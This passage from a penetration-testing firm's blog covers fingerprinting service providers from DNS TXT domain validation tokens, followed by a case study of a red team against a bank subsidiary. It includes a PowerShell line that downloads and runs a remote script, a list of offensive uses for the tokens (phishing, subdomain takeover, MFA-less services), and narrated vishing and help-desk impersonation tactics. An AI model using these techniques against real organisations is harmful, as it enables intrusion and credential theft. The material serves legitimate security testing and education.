5 Email Marketing and Website Analytics providers like Pardot and Salesforce seemed to dominate the ranks as well, no surprise there.

There are many other types of services that range from caching services like Cloudflare to security services like “Have I Been Pwned”, but the categories above seem to be the most ubiquitous. It’s also worth noting that I removed SPF records, because technically there are not domain validation tokens.  However, SPF records are another rich source of information that could potentially lead to email spoofing opportunities if they aren’t managed well.  Either way, they were out of scope for this blog.

Top 25 Service Providers

Below are the top 25 service providers I was able to fingerprint based on their domain validation token (TXT record).  However, in total I was able to provide attribution for around 130.

 COUNT PROVIDER CATEGORY EXAMPLE TOKEN
149785 gmail.com Cloud Services google-site-verification=ZZYRwyiI6QKg0jVwmdIha68vuiZlNtfAJ90msPo1i7E
70797 microsoft office 365 Cloud Services ms=hash
16028 facebook.com Cloud Services facebook-domain-verification=zyzferd0kpm04en8wn4jnu4ooen5ct
11486 globalsign.com Certificate Authority _globalsign-domain-verification=Zv6aPQO0CFgBxwOk23uUOkmdLjhc9qmcz-UnQcgXkA
5097 Adobe Enterprise Services Electronic Signing,Cloud Services adobe-idp-site-verification=ffe3ccbe-f64a-44c5-80d7-b010605a3bc4
4093 Amazon Simple Email Cloud Services amazonses:ZW5WU+BVqrNaP9NU2+qhUvKLdAYOkxWRuTJDksWHJi4=
3605 globalsign.com Certificate Authority globalsign-domain-verification=zPlXAjrsmovNlSOCXQ7Wn0HgmO–GxX7laTgCizBTW
3486 atlassian services Collaboration atlassian-domain-verification=Z8oUd5brL6/RGUMCkxs4U0P/RyhpiNJEIVx9HXJLr3uqEQ1eDmTnj1eq1ObCgY1i
2700 mailru- Cloud Services mailru-verification: fa868a61bb236ae5
2698 yandex.com Cloud Services yandex-verification=fb9a7e8303137b4c
2429 Pardot (Salesforce) Marketing and Analytics pardot_104652_*=b9b92faaea08bdf6d7d89da132ba50aaff6a4b055647ce7fdccaf95833d12c17
2098 docusign.com Electronic Signing docusign=ff4d259b-5b2b-4dc7-84e5-34dc2c13e83e
1468 webex Collaboration webexdomainverification.P7KF=bf9d7a4f-41e4-4fa3-9ccb-d26f307e6be4
1358 www.sendinblue.com Marketing and Analytics Sendinblue-code:faab5d512036749b0f69d906db2a7824
1005 zoho.com Email zoho-verification=zb[sequentialnumber].zmverify.zoho.[com|in]
690 dropbox.com Collaboration dropbox-domain-verification=zsp1beovavgv
675 webex.com Collaboration ciscocidomainverification=f1d51662d07e32cdf508fe2103f9060ac5ba2f9efeaa79274003d12d0a9a745
607 Spiceworks.com Security workplace-domain-verification=BEJd6oynFk3ED6u0W4uAGMguAVnPKY
590 haveibeenpwned.com Security have-i-been-pwned-verification=faf85761f15dc53feff4e2f71ca32510
577 citrix.com Collaboration citrix-verification-code=ed1a7948-6f0d-4830-9014-d22f188c3bab
441 brave.com Collaboration brave-ledger-verification=fb42f0147b2264aa781f664eef7d51a1be9196011a205a2ce100dc76ab9de39f
427 Adobe Sign / Document Cloud Electronic Signing adobe-sign-verification=fe9cdca76cd809222e1acae2866ae896
384 Firebase (Google) Development and Publishing firebase=solar-virtue-511
384 O365 Cloud Services mscid=veniWolTd6miqdmIAwHTER4ZDHPBmT0mDwordEu6ABR7Dy2SH8TjniQ7e2O+Bv5+svcY7vJ+ZdSYG9aCOu8GYQ==
381 loader.io Security loaderio=fefa7eab8eb4a9235df87456251d8a48

Automating Domain Validation Token Fingerprinting

To streamline the process a little bit I’ve written a PowerShell function called “Resolve-DnsDomainValidationToken”.  You can simply provide it with domains and it will scan the associated DNS TXT records for known service providers based on the library of domain validation tokens I created.  Currently it supports parameters for a single domain, a list of domains, or a list of URLs.

Resolve-DnsDomainValidationToken can be downloaded HERE.

Command Example

To give you an idea of what the commands and output look like I’ve provided an example below.  The target domain was randomly selected from the Alexa 1 Million list.

# Load Resolve-DnsDomainValidationToken into the PowerShell session
IEX(New-Object System.Net.WebClient).DownloadString("https://raw.githubusercontent.com/NetSPI/PowerShell/master/Resolve-DnsDomainValidationToken.ps1")

# Run Resolve-DnsDomainValidationToken to collect and fingerprint TXT records
$Results = Resolve-DnsDomainValidationToken -Verbose -Domain adroll.com  

# View records in the console
$Results

Domain Validation Token Fingerprint

For those of you that don’t like staring at the console, the results can also be viewed using Out-GridView.

# View record in the out-grid view
$Results | Out-GridView

Domain Validation Token Fingerprint Gridview

Finally, the command also automatically creates two csv files that contain the results:

  1. Dns_Txt_Records.csv contains all TXT records found.
  2. Dns_Txt_Records_Domain_Validation_Tokens.csv contains those TXT records that could be fingerprinted.

Domain Validation Token Fingerprint Csv

How can Domain Validation Tokens be used for Evil?

Below are a few examples of how we’ve used domain validation tokens during penetration tests.  I’ve also added a few options only available to real-world attackers due to legal constraints placed on penetration testers and red teams.

Penetration Testing Use Cases

  1. Services that Support Federated Authentication without MFA
    This is our most common use case. By reviewing domain validation tokens we have been able to identify service providers that support federated authentication associated with the company’s Active Directory deployment.  In many cases they aren’t configured with multi-factor authentication (MFA).  Common examples include Office 365, AWS, G Suite, and Github.

    Pro Tip: Once you’ve authenticated to Azure, you can quickly find additional service provider targets that support federated/managed authentication by parsing through the service principal names.  You can do that with Karl’s Get-AzureDomainInfo.ps1 script.

  2. Subdomain Hijacking Targets
    The domain validation tokens could reveal services that host content on the company’s subdomains, which can be taken over once the associated CNAME records go stale. For information on common techniques, Patrik Hudak wrote a nice overview here.
  3. Social Engineering Fuel
    Better understanding the technologies and service providers used by an organization can be useful when constructing phone and email phishing campaigns.
  4. General Measurement of Maturity
    When reviewing domain validation tokens for all of the domains owned by an organization it’s possible to get a general understanding of their level of maturity, and you can start to answer some basic questions like:

    1. Do they use Content Distribution Networks (CDNs) to distribute and protect their website content?
    2. Do they use third-party marketing and analytics? If so, who? How are they configured?
    3. Do they use security related service providers? What coverage do those provide?
    4. Who are they using to issue their SSL/TLS certificates? How are they used?
    5. What mail protection services are they using? What are their default configurations?
  5. Analyzing domain validation tokens for a specific online service provider can yield additional insights. For example,
    1. Many domain validation tokens are unique numeric values that are simply incremented for each new customer.  By analyzing the values over thousands of domains you can start to infer things like how long a specific client has been using the service provider.
    2. Some of the validation tokens also include hashes and base64-encoded values that could potentially be cracked or decoded offline to reveal information.
  6. Real-world attackers can also attempt to compromise service providers directly and then move laterally into a specific company’s site/data store/etc. Shared hosting providers are a common example. Penetration testers and red teams don’t get to take advantage of those types of scenarios, but if you’re a service provider you should be diligent about enforcing client isolation to help avoid opening those vectors up to attackers.

Wrap Up

Analyzing domain validation tokens found in DNS TXT records is far from a new concept, but I hope the library of fingerprints baked into Resolve-DnsDomainValidationToken will help save some time during your next red team, pentest,  or internal audit.  Good luck and hack responsibly!


Leading Financial Institution Leveraged NetSPI Red Team Service to Improve Their Security Posture

The Situation

In a report published by consulting firm West Monroe Partners, 40 percent of acquiring businesses said they discovered a high-risk security problem at an acquisition after a deal went through. With this in mind, executive management at one of America’s largest banks wanted to ensure that one of their subsidiaries wasn’t suffering from similar security control gaps. In addition, the bank wanted to understand if identified security gaps could be leveraged to gain unauthorized access to the subsidiary’s networks and resources. To answer those questions, and report on the subsidiary’s responsiveness to real-life attack scenarios, the bank hired NetSPI to conduct a red team operation.

The Approach

During some red team operations, clients provide information to save time, such as employee names, reporting structures, policy details, or system targets. In this instance, the test was conducted using a black box approach, meaning no information was provided by the client. Despite this handicap, NetSPI would put the bank’s newly merged digital infrastructure to the test by attempting to achieve and maintain unauthorized network access via both technical testing methods and social engineering. The bank wanted to know if systems, services, or employee identification processes were vulnerable. If so, they wanted NetSPI to exploit those vulnerabilities in order to gain access to critical resources owned by the subsidiary. They also wanted to know if any operating systems or applications were creating immediate risk and if the security controls that were deployed could be bypassed. NetSPI would find out.

The team began by conducting a significant amount of reconnaissance, learning the names of some employees and identifying their email addresses and phone numbers. Armed with this information, NetSPI initiated a targeted social engineering attack. A robo-caller was used to spoof the bank’s voice mail system, asking a targeted employee to verify their identity with their username and password. This tactic was successful in gaining an employee’s username and password. Having successfully obtained the necessary credentials, the next step was to impersonate the employee in an attempt to obtain access to the corporate Virtual Private Network (VPN).

At A Glance

Client

One of the largest U.S. financial institutions offering a comprehensive range of financial services nationwide.

Challenge

Conduct a black box red team assessment to identify weaknesses in network security, policies and procedures.

Approach

Using social engineering and technical testing methods to gain credentials, access the network and escalate privileges.

Results

Security practices and procedures have been strengthened, significantly improving the bank’s overall security posture.

  1. “Cybersecurity Due Diligence in M&A”, West Monroe Partners, July 12, 2016.

A NetSPI red team member, acting as the targeted employee, called the bank’s IT help desk and stated they were having trouble connecting to corporate network over the VPN. The help desk provided the NetSPI team member with the information below without verifying the caller’s identity beyond asking for their username, which had been obtained using the robo-caller:

  • A link where the VPN client could be downloaded.
  • Installation instructions for the VPN client
  • A one-time token that could be used for the VPN Multi-Factor Authentication (MFA) process, which was sent to a non-corporate email address controlled by the NetSPI red team member.

Now, with remote access to the target network and Active Directory domain credentials in hand, NetSPI started examining the environment for privilege escalation paths. It wasn’t long before a critical discovery was made: a Microsoft Windows server had been left unpatched, enabling the team to exploit the EternalBlue vulnerability. NetSPI then exploited this vulnerability to gain a foothold on the domain system and continue escalating towards established targets. This foothold was maintained for multiple days, and the MFA token used to access the network over VPN was reused multiple times. This shined some light on a gap between the bank’s policy, which mandates that a one-time VPN token expire after 24 hours, and the reality of the subsidiary’s implementation.

After multiple days, the bank’s internal IT staff identified that there was an unauthorized user on the network and their Incident Response team was dispatched to confiscate the targeted employee’s compromised laptop. At this point, the bank personnel in the know revealed to all necessary parties that the bank had engaged NetSPI to conduct a red team assessment. A conference call was quickly held to begin the deconfliction process and ensure that the bank had indeed discovered NetSPI’s activities and not those of an actual attacker. The bank and NetSPI were able to confirm that the red team breach had been discovered. The bank elected to end the engagement, and NetSPI moved on to the reporting phase, which resulted in a deliverable that contained both the overall narrative of the engagement and detailed write-ups for all discovered vulnerabilities and weaknesses.

The Results

After the deconfliction process, internal teams worked with NetSPI to understand the attack path and technical testing leveraged throughout the engagement. The bank then took this information and built a remediation plan to address the deficiencies. For example, the off-the-shelf network detection software the bank had installed performed poorly, even though evidence of a network intrusion was captured in the log files. Because the software had not been properly tuned to the environment, alarms were not being triggered even though the intrusion had been logged. This has now been remedied, along with large improvements to their vulnerability management practices.

In addition, the findings of the assessment resulted in additional funding being made available to address the problem areas highlighted in the final report. A special focus was placed on security awareness training for employees and on adherence to the employee identification and verification practices used by help desk staff, making them more aware of malicious actors.

To confirm that the remediation activities at the bank were successful, NetSPI performed an additional round of technical testing to verify that the identified vulnerabilities had been addressed.

Discover how the NetSPI BAS solution helps organizations validate the efficacy of existing security controls and understand their Security Posture and Readiness.
